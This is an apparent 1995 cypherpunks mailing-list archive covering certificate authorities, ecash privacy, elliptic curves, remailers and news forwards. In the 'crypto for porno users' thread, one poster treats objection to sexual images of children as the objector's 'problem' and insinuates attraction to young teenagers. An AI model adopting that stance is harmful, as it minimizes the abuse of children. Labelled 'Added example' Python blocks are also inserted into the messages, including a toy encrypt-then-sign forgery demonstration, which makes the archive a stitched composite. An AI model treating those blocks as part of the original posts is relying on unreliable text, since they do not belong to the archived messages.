Date: Sun, 26 Nov 1995 05:32:40 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



   I'm sorry but I don't care if the images come from Mars. Jerking off 
to the images of kids is sick.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 07:15:26 +0800
To: cypherpunks@toad.com
Subject: NOF_uss
Message-ID: <199511252301.SAA20824@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, Nov 17, 1995:

   "Security Schemes Aspire to No Fuss System Protection."

      Because of the painful trade offs between security and
      usability that come with current protective measures,
      computer scientists have been investigating new ways to
      detect and ward off intruders that present fewer
      obstacles to users and administrators. Two of the most
      intriguing directions announced at the Baltimore
      security conference were reported by researchers at
      Purdue University's Computer Operations, Audit, and
      Security Technology laboratory (COAST). The first was an
      attempt to harness techniques from artificial
      intelligence to detect intrusions; the second, a pilot
      test of what has been called software forensics -- an
      effort to recognize malign programs by identifying the
      fingerprints of their creators.

   NOF_uss  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 07:14:35 +0800
To: cypherpunks@toad.com
Subject: SAC_lam
Message-ID: <199511252302.SAA20929@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-25-95. Washrag:

   "Hacking Away at the Internet's Web. Security Concerns Grow
   as Saboteurs Target On-Line Sites."

      Computer hackers are turning their unwelcome attentions
      to the World Wide Web. Web sites are among the easiest
      places on the Internet to disrupt and sabotage, experts
      say, in part because many of the people who set up such
      displays pay little attention to security. Such
      unprotected systems located outside of a secure network
      are often called "sacrificial lambs," noted a manager at
      Trusted Information Systems Inc.

   SAC_lam  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sun, 26 Nov 1995 07:07:41 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks article in The Nando Times
Message-ID: <199511252256.PAA05780@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out

http://www.nando.net/newsroom/ntn/info//101095/info446_33.html

It's an article about the cypherpunks, mostly bullshit and hyperbole.  I
especially liked the parts about "Larry Detweiler" and this quote from Jim
Kallston, of the FBI: "We're not trying to stop technology," Kallston said.
"We're trying to collect information on criminals and terrorists and child
pornographers."  What happened to the fourth horseman Jim?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 26 Nov 1995 10:26:44 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511252105.QAA08724@homeport.org>
Message-ID: <9511260216.AA23306@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> | C) Don't settle for less than X.509 ver 3, because this allows the 
> | certificate to carry within it a reference to the location of the CRL 
> | list.  Use that feature.
> 
> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

I don't believe that it does.

For those who missed it, the problem is that the encryptor in an
encrypt-before-signing protocol is able to use his knowledge of the
factorization of the encryption modulus to compute a discrete log, and
forge another message for which the signature is also valid (after
registering the new exponent).

   - Mark -



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
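
[Added example, not part of Mark Chen's message or of Anderson's paper: a toy Python model of the encrypt-before-signing weakness described above, next to a variant in which the signature also covers the recipient's public key. All key sizes, function names and message values are constructed for illustration; the sent message is built as a power of the substitute so that the discrete log exists in this toy group.]

```python
import hashlib
from math import gcd

# Toy keys, constructed for this example; real moduli are far larger.
P_A, Q_A = 2**61 - 1, 2**89 - 1            # signer's primes (two Mersenne primes)
N_A, E_A = P_A * Q_A, 65537
D_A = pow(E_A, -1, (P_A - 1) * (Q_A - 1))  # signer's private exponent

P_B, Q_B = 1019, 1031                      # factors of the encryption modulus
N_B, E_B = P_B * Q_B, 17                   # registered encryption key is (E_B, N_B)


def digest(*fields):
    """Hash a tuple of integers to a number below the signer's modulus."""
    data = b"|".join(str(f).encode() for f in fields)
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N_A


def sign(*fields):
    return pow(digest(*fields), D_A, N_A)


def signature_ok(sig, *fields):
    return pow(sig, E_A, N_A) == digest(*fields)


def encrypt(message, key):
    exponent, modulus = key
    return pow(message, exponent, modulus)


def send_encrypt_then_sign(message, recipient_key):
    """Weak form: the signature covers the ciphertext and nothing else."""
    ciphertext = encrypt(message, recipient_key)
    return ciphertext, sign(ciphertext)


def send_key_bound(message, recipient_key):
    """Hardened form: the signature also covers the recipient key that was used."""
    ciphertext = encrypt(message, recipient_key)
    return ciphertext, sign(ciphertext, *recipient_key)


def accept_weak(claimed, ciphertext, sig, registered_key):
    """A third party's check that the signer sent `claimed` under this key."""
    return signature_ok(sig, ciphertext) and encrypt(claimed, registered_key) == ciphertext


def accept_key_bound(claimed, ciphertext, sig, registered_key):
    return (signature_ok(sig, ciphertext, *registered_key)
            and encrypt(claimed, registered_key) == ciphertext)


def discrete_log(base, target, p, q):
    """Smallest x >= 1 with base**x == target (mod p*q), by exhaustive search.

    The search bound lcm(p-1, q-1) needs the factorization, and exhaustive
    search only works here because the modulus is toy-sized.
    """
    modulus = p * q
    bound = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    acc = 1
    for x in range(1, bound + 1):
        acc = acc * base % modulus
        if acc == target:
            return x
    return None


M_OTHER = 424242                 # the message that is claimed afterwards
M_SENT = pow(M_OTHER, 7, N_B)    # what was really sent; built so the log exists


def run_demo():
    original_key = (E_B, N_B)
    x = discrete_log(M_OTHER, M_SENT, P_B, Q_B)
    new_key = (x * E_B, N_B)     # same modulus, re-registered exponent

    c_weak, s_weak = send_encrypt_then_sign(M_SENT, original_key)
    c_bound, s_bound = send_key_bound(M_SENT, original_key)
    return {
        "weak_original": accept_weak(M_SENT, c_weak, s_weak, original_key),
        "weak_after_rekey": accept_weak(M_OTHER, c_weak, s_weak, new_key),
        "bound_original": accept_key_bound(M_SENT, c_bound, s_bound, original_key),
        "bound_after_rekey": accept_key_bound(M_OTHER, c_bound, s_bound, new_key),
    }


if __name__ == "__main__":
    for name, accepted in run_demo().items():
        print(f"{name:18} accepted={accepted}")
```

[The weak form accepts both claims because the signature says nothing about which key produced the ciphertext; binding the key into the signed data, or signing the plaintext before encrypting, removes the ambiguity.]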




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aleph@toad.com
Date: Sun, 26 Nov 1995 10:42:47 +0800
Subject: No Subject
Message-ID: <9511260232.AA20127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Aleph One <aleph1@dfw.net>
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Date: Sat, 25 Nov 1995 00:02:29 -0600 (CST)

	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cypherpunk CA. Probably run by one 
of the respected members in the group such as Sammer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com
Date: Sun, 26 Nov 1995 10:41:05 +0800
Subject: No Subject
Message-ID: <9511260232.AB20127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: jimbell@pacifier.com (jim bell)
To: cypherpunks@toad.com
Cc: vznuri@netcom.com
Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
Date: Sat, 25 Nov 1995 17:00:16 -0800

The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>From: jimbell@pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
>that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
>away with your tail between your legs!
>
>Stop being a wuss!  If you're as correct as you claim you are, you have no
>reason to fear.  Debate, dammit!
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 25 Nov 1995 15:55:53 +0800
To: iang@cory.EECS.Berkeley.EDU (Ian Goldberg)
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511250744.SAA14637@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
  and cypherpunks@toad.com

...
> Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
> I have a binary, which I can't even run...).  
...

Sounds like good work!

...
> I guess the important bit is that the payee, the item being bought,
> and the cost are sent _in the clear_.  Some of the people I've talked
> to think this is a huge privacy breach, and some don't.  You all can
...

Yeah, it probably is. Then again you can probably use a dummy
description, no?

However, that doesn't get around the fact that anyone intercepting
the packet who knows where it came from will immediately see straight
through payer anonymity.

...
>    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> 	    the source?"
...

A Source Close To Digicash That Did Not Wish To Be Quoted
once described them as 'crown jewels' (competitive advantage).

ASCTDTDNWTBQ then appealed to Digicash's track record.

I certainly hope that this genuinely is not Digicash's official opinion.


Thank you for once again showing the futility of security by obscurity.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLbIjixV6mvvBgf5AQFKiwP/fJKIZnRM4HQzkdzYNTTDPP/CZNGlLWQI
UnA4la2134SoBde/hPsSiniuWBlESU8rpbA3IX+mygh50x/4CSb86VClvgIF8xKp
XFRwXljxer2dqKV3troMYFQfYWrUoj6NXTJIRQWwBJ6ilHcXE1OWtHWGPgAB9/Gv
79z3R4njwmw=
=OPp0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:17:42 +0800
To: cypherpunks@toad.com
Subject: Re: MIT Distribution Site (FTP) for PGP and Other Products *DOWN*
Message-ID: <acdd5fac0002100427f5@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <jis-2511951419240001@road-warrior.mit.edu>, jis@mit.edu
(Jeffrey I. Schiller) wrote:

> The anonymous FTP server running on net-dist.mit.edu (which is also
> bitsy.mit.edu) is currently down due to a failure of the disk drive
> that hosts the files. We expect to replace the disk this afternoon
> (Saturday) and begin restoral operations as soon as the new disk
> is cabled up.

Service is now restored (on a new disk).

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLeu8sUtR20Nv5BtAQGQGgP8CCm6SJdkxNAv125clOeWq/3VEFMBGgx7
GTpZIKcZutWSqBbC8ATUDoyqcIURR+xEUvKxegktauYkS+fdfHnqsD84OnA1lG2X
4bOwO8G9zA2Uy93lcVrM4WrAYE1J4hseiuhFK6T4kGbHek91ZU/dY5xGjgo+3Wrm
FeYXRwfujJY=
=hAXB
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 08:26:54 +0800
To: cypherpunks@toad.com
Subject: AI and Author-ID Security
Message-ID: <199511260016.TAA27186@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The AI and author-ID security programs covered in the Nov
   17 Science article are described in detail at:

   <http://www.cs.purdue.edu/coast/coast.html>


   Active Defense of a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of
      Computer Sciences, Purdue University; CSD-TR-95-008;
      1995.

   Defending a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of Computer
      Sciences, Purdue University; CSD-TR-95-022; 1995.

   Authorship Analysis: Identifying the Author of a Program
      Ivan Krsul; Department of Computer Sciences, Purdue
      University; MS Thesis; CSD-TR-94-030; 1994.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 26 Nov 1995 08:53:27 +0800
To: moroni@scranton.com (Moroni)
Subject: Re: crypto for porno users
In-Reply-To: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>
Message-ID: <199511260041.TAA08908@homeport.org>
MIME-Version: 1.0
Content-Type: text



Kids like Tracy Lords, who looked to be over 18 in all her movies?
(All of which are now illegal to own because she was under 18 when she
made them.)


Adam "Clearly a sicko who should be locked up for his own good."

Moroni wrote:

|    I'm sorry but I don't care if the images come from Mars. Jerking off
| to the images of kids is sick.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 26 Nov 1995 03:03:26 +0800
To: perry@piermont.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <m0tJPeV-0002eCC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Perry" == Perry E Metzger <perry@piermont.com> writes:

    Perry> become a C.A. and to run one, and it turns out not to be
    Perry> particularly onerous, I or one of my corporate alter egos
    Perry> might be willing. I must say, though, that being an
    Perry> anti-fan of X.509 the situation would be ironic...

;).

Ten easy steps to become a C.A.:

1. get a copy of SSLeay (try ftp://ftp.cert.dfn.de/pub/tools/net/ssleay)

2. install it

3. generate a key using 'genrsa -idea -rand
/dev/random:/var/adm/messages:/etc/utmp:/proc/net/dev -out
cypherpunks.key 1024'. Substitute a higher number than 1024 depending
on your paranoia. Choose an inconvenient pass phrase.

4. Use your favourite secret splitting method and send key and pass
phrase to respected members of the cypherpunks community.

5. Generate your X.509 certificate using makecert.

6. Sign other people's certificates using x509.

7.-10. Get yourself a decent beer and Applied Cryptography 2nd Ed.

Sorry, I'd love to give you details for 5 and 6, but I'm out of
time. I'll deliver them tomorrow.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMLdlB0yjTSyISdw9AQEs5QP/T5K8qdD0lX9NrqsYxcudpUSPBoAOuzUb
oy2IllKpliviJaGZCb5o6ga1jgoCObyhe6HNaaQINOHhWyP09Gzs+jdNxMsqcK1z
Vxt9NOH+cHyBC67rPU77vDwB27dXNIob+u1KwKldWkSB3Id+qLR+Pz5yXylYAMhI
ccuVcA0BpOU=
=iGp+
-----END PGP SIGNATURE-----
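
[Added example, not from Andreas's post and not part of SSLeay: step 4 leaves the secret splitting method open, so here is one option, a k-of-n Shamir split of the CA key's pass phrase in Python. The threshold, the number of holders, the field prime and the sample pass phrase are assumptions chosen for illustration.]

```python
import secrets

PRIME = 2**127 - 1      # Mersenne prime defining the field for share arithmetic
CHUNK = 15              # bytes per chunk; 120 bits always fits below PRIME

# Constructed sample input, not a real pass phrase.
SAMPLE_PASS_PHRASE = b"an inconvenient pass phrase, 1995"


def _poly_at(coeffs, x):
    """Evaluate a polynomial (constant term first) at x in the field."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % PRIME
    return acc


def split(secret: bytes, threshold: int, holders: int):
    """Split `secret` so that any `threshold` of `holders` shares rebuild it.

    Each share is a tuple (x, secret_length, [y value per chunk]).
    """
    if not 1 < threshold <= holders:
        raise ValueError("need 1 < threshold <= holders")
    ys = [[] for _ in range(holders)]
    for start in range(0, len(secret), CHUNK):
        value = int.from_bytes(secret[start:start + CHUNK], "big")
        # Fresh random polynomial per chunk, with the chunk as constant term.
        coeffs = [value] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]
        for holder in range(holders):
            ys[holder].append(_poly_at(coeffs, holder + 1))
    return [(holder + 1, len(secret), ys[holder]) for holder in range(holders)]


def recover(shares):
    """Rebuild the secret by Lagrange interpolation at x = 0.

    Returns None when a reconstructed chunk does not fit its byte length,
    which is the usual result when fewer than `threshold` shares are given.
    """
    xs = [x for x, _, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share")
    length = shares[0][1]
    out = bytearray()
    for idx in range(len(shares[0][2])):
        value = 0
        for xj, _, ys in shares:
            num = den = 1
            for xm in xs:
                if xm != xj:
                    num = num * (-xm) % PRIME
                    den = den * (xj - xm) % PRIME
            value = (value + ys[idx] * num * pow(den, -1, PRIME)) % PRIME
        size = min(CHUNK, length - idx * CHUNK)
        if value >> (8 * size):
            return None
        out += value.to_bytes(size, "big")
    return bytes(out)


if __name__ == "__main__":
    shares = split(SAMPLE_PASS_PHRASE, threshold=3, holders=5)
    print("any three holders:", recover([shares[4], shares[1], shares[3]]))
    print("only two holders: ", recover(shares[:2]))
```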




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@mediacity.com (Norman Hardy)
Date: Sun, 26 Nov 1995 13:58:57 +0800
To: cypherpunks@toad.com
Subject: Learning about Elliptic Curves
Message-ID: <acddae750002100481c8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crypto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i after 0 such that a_0 =
a_i. Knowing the period is tantamount to knowing the private key.
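
[Added example, not part of Norman Hardy's post: the properties he lists, written once in Python against an abstract group operation and run on a multiplicative group mod a prime, on an RSA-style composite modulus, and on a textbook-sized elliptic curve. It goes slightly beyond the post by making the shared interface explicit; the curve y^2 = x^3 + 2x + 2 over F_17, the base point (5, 1) and the other small parameters are illustrative choices, far too small for real use.]

```python
CURVE_A, CURVE_B, CURVE_P = 2, 2, 17    # y^2 = x^3 + 2x + 2 over F_17 (toy curve)
BASE_POINT = (5, 1)
INFINITY = None                         # identity element of the curve group


def on_curve(point):
    if point is INFINITY:
        return True
    x, y = point
    return (y * y - (x * x * x + CURVE_A * x + CURVE_B)) % CURVE_P == 0


def ec_add(p1, p2):
    """Group operation on the curve: a_(i+j) from a_i and a_j."""
    if p1 is INFINITY:
        return p2
    if p2 is INFINITY:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % CURVE_P == 0:
        return INFINITY                 # a point plus its negative
    if p1 == p2:
        slope = (3 * x1 * x1 + CURVE_A) * pow(2 * y1 % CURVE_P, -1, CURVE_P)
    else:
        slope = (y2 - y1) * pow((x2 - x1) % CURVE_P, -1, CURVE_P)
    x3 = (slope * slope - x1 - x2) % CURVE_P
    y3 = (slope * (x1 - x3) - y1) % CURVE_P
    return (x3, y3)


def mul_mod(modulus):
    """Group operation for integers under multiplication mod `modulus`."""
    return lambda a, b: a * b % modulus


def nth_element(g, i, op, identity):
    """Return a_i using O(log i) calls to op (binary method)."""
    result, addend = identity, g
    while i:
        if i & 1:
            result = op(result, addend)
        addend = op(addend, addend)
        i >>= 1
    return result


def period(g, op, identity):
    """First i > 0 with a_i == a_0, found by stepping; toy sizes only."""
    i, current = 1, g
    while current != identity:
        current = op(current, g)
        i += 1
    return i


def summary():
    return {
        "a_13 in Z_23* from g=5": nth_element(5, 13, mul_mod(23), 1),
        "period of 5 in Z_23*": period(5, mul_mod(23), 1),
        "period of 2 mod 11*23": period(2, mul_mod(11 * 23), 1),
        "a_2 on curve": nth_element(BASE_POINT, 2, ec_add, INFINITY),
        "a_3 on curve": nth_element(BASE_POINT, 3, ec_add, INFINITY),
        "period on curve": period(BASE_POINT, ec_add, INFINITY),
    }


if __name__ == "__main__":
    for label, value in summary().items():
        print(f"{label:24} {value}")
```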






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 26 Nov 1995 16:46:58 +0800
To: cypherpunks@toad.com
Subject: [FYI] FBI Training Eastern European Police
Message-ID: <v03003e03acddb4a8d772@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


[ from: The Hungary Report #1.28, free weekly, direct from Budapest ]
[ retransmitted to list without permission to increase distribution ]

  FBI School Teaches New Tricks to Old Enemies

  By Susan Milligan   Copyright (c) 1995

  In matching navy blue polo shirts, the students sat transfixed as
  they watched slides showing the destruction of the Oklahoma City and
  World Trade Center bombings.

  "God forbid you should ever have anything like this happen over
  here," American instructor Ed Burwitz told his Central European
  class, outfitted with headphones for simultaneous translation of the
  lecture. "It is a tough task for any freedom-loving country to prevent
  terrorism," he added.

  The class on forensics is typical of what goes on in law enforcement
  academies across America. But in this classroom, the instructors are
  teaching crime-fighting tactics to students from onetime enemy
  nations.

  "This could not have happened five years ago," said Laszlo Simon, the
  Hungarian director of the International Law Enforcement Academy here.
  "We don't preach or teach," said Leslie Kaciban, the American
  director of the newly-opened facility. Instead, the American
  instructors - culled from the FBI and other law enforcement agencies
  - share information and experiences with the students for them to
  adapt to their systems.

  Students from Hungary, Russia, Poland, the Czech Republic and other
  Central and Eastern European nations attend ILEA's 8-week sessions,
  the first of which began in April.

  The United States fronted $2.5 million to renovate the campus, which
  includes a brand-new gym, classrooms, dormitories and one of
  Hungary's few indoor tennis courts. The Hungarian government
  contributed $500,000 to renovate the facility, but the U.S. will pay
  the $3.5 million yearly cost to operate the
  center, which is modeled after the law enforcement training center in
  Quantico, Va.

  The facility looks like any other college campus - students go on
  field trips together, take "wellness" physical fitness class
  together, and will have a yearbook and alumni newsletter.
  The idea is to help the Eastern Europeans with their burgeoning
  crimes problems, as well as to foster cooperation on international
  crime problems.

  "I'm amazed at the freedom of travel that is possible" after the
  opening up of the Eastern nations, Burwitz said. But "that means
  criminals can travel as well," he said, allowing them to traffic
  drugs and contraband. "The more interaction we have with these
  countries in law enforcement, the better it will be for emerging
  democracies," Kaciban said.

  Class topics range from "human dignity" - how to treat a crime
  suspect - to undercover operations and fraud. April's bombing of the
  federal building in Oklahoma City is being used as an example in
  several classes.

  In "crisis management," students will learn "how to contain it (a
  crisis) and keep it from erupting," said instructor Stephen Brooks,
  who helped handle the Oklahoma City bombing. Big-scale bombings are
  not common to this part of the world, students said. But they said
  they learned a lot about how to fight organized crime, which is
  mushrooming in the aftermath of the fall of communism. "They told
  they have a lot of problems (with organized crime), and that it's
  better if we learn from their mistakes," said Hungarian student
  Vilmos Szeplaki.

  Organized crime is doubly damaging to the emerging nations, because
  it undermines their economies, Kaciban said. Investors are naturally
  reluctant to dump money into a nation if they believe there is
  rampant corruption. Some teachings do not translate for the European
  students. For example, there is no Russian RICO - the Racketeer
  Influenced and Corrupt Organizations Act that is one of the strongest
  American legal tools against organized crime.

  Eastern European crime syndicates tend not to be based in crime
  families, instructors said. And organized crime in Russia and Ukraine
  is so much a part of the society, that it's hard to stop it, said Amy
  O'Neil, a State Department official not involved in the ILEA. "Under
  the communist system, you basically did what you could get away with.
  Everyone broke laws," O'Neil said. "That's how you survived."

  Both students and teachers said there was a remarkable similarity,
  however, in the use of evidence and investigatory tools among the
  countries. Eastern Europeans are very familiar with the use of DNA
  testing, for example, to identify suspects, although they don't
  always have the money to do it, Burwitz said. "There are different
  orders of laws between the U.S. and here," said a Czech student who
  would identify himself only as Milan. "But essentially, we have the
  same methods of investigation."

                                                * * *
  Susan Milligan <susan.milligan@magnet.hu> is a free-lance writer and
  stringer for the Boston Globe, the San Francisco Examiner, Business
  Central Europe and Hollywood Reporter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 26 Nov 1995 14:24:00 +0800
To: moroni@scranton.com
Subject: Re: crypto for porno users
Message-ID: <01HY2X8H88VK8WYKBT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"moroni@scranton.com"  "Moroni" 25-NOV-1995 16:21:44.10

   I'm sorry but I don't care if the images come from Mars. Jerking off
to the images of kids is sick.
----------------------------
	That's your opinion, and thus your problem to be dealt with by you.
Yes, I'm calling that a _problem_. If it makes you want to harm others who
aren't harming anyone else, then it's a problem.
	I also have my doubts as to whether you can honestly deny ever being
attracted by a young teenager, even as an adult. But your sexual preferences
are not my business, any more than anyone else's are of yours.
	I will refrain from posting further on cypherpunks about this, since
it's getting far from the purpose of the list. Feel free to reply in private
email.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 26 Nov 1995 17:51:31 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511260942.BAA09733@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Aleph One wrote:

> On Sat, 25 Nov 1995, Perry E. Metzger wrote:
> 
> > Hmmm. If someone is willing to find out what is needed to become a
> > C.A. and to run one, and it turns out not to be particularly onerous,
> > I or one of my corporate alter egos might be willing. I must say,
> > though, that being an anti-fan of X.509 the situation would be ironic...
> > 
> > Perry
> 
> Well from Netscape perspective as far as I know you need nothing. Basically
> when the browser finds a new CA that it does know about it prompts
> the user and through a series of dialog boxes the user chooses to trust
> it or not.

Gee, wasn't that clever of Netscape??

Lilies that fester smell worse than weeds ... people should remember that.
(I think Shakespeare first wrote that in one of his sonnets ...)

> (Well that is theory, and what netscape release notes say, since
> I don't have access to an SSL server right now, and would need to figure
> out how to make my own certificate, I haven't tried it).

Bingo.  *theory* ... right ... I mean what would be the point??

Installing Netscape degrades your inherent system security.  No ifs, 
ands, or buts.

Netscape Navigator basically destroys whatever sense of privacy or
security, any person ever had the illusion of having.  And that pretty 
well rules out CA.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sun, 26 Nov 1995 14:56:59 +0800
To: remailer-operators@c2.org
Subject: REPOST: Amnesia Remailer
Message-ID: <199511260646.BAA06047@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Excuse the repost but I was asked to do this again !MIME :)

The amnesia remailer is now available for public use:

amnesia is a combination mixmaster/type 1 remailer supporting
the following capabilities:


<amnesia.chardos.connix.com> cpunk mix pgp hash latent cut ek ksub

Encrypted: PGP  - header
##		- pasting
Latency:	- header
Cutmarks:	- header
Encrypt-Key:	- header

Due to the nature of my mail connection there is an automatic variable
latency of 0-180 minutes. The reordering pool is set to 5 presently.

amnesia is currently running the following software:

Lance Cottrell's Mixmaster v.2.0.3beta6
Lance Cottrell's Reordering package.
John Fleming's  Freedom Remailer v.1.00 (upgrading to 1.6beta soon)

Hopefully USENET posting capability will be added soon.

The remailer keys are attached.

Scott Kenney


=-=-=-=-=-=-=-=-=-=-=-=
amnesia amnesia@chardos.connix.com e320fd79c4c229decabe4d486bd84394 2.0.2


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLgNDZQgY7wl3Gh1AQGUVQQA05aN+xx4sVVohysVN8xrvsvc5KxP/82y
sLUHCerLEsKH2EHnb1mcoT8Ayu+nrp+0YU+/di2QNF+AMMONhP/J0OQJt7odqbFM
ZgxUmyX9ya1UnRmZDiTEubGsUWeOMt9IZoeLryzMgYcB9502GpvMZWp8r6YFW5vN
nEphpRRncWY=
=Abso
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 26 Nov 1995 18:00:44 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511260953.BAA10105@jobe.shell.portal.com>
MIME-Version: 1.0
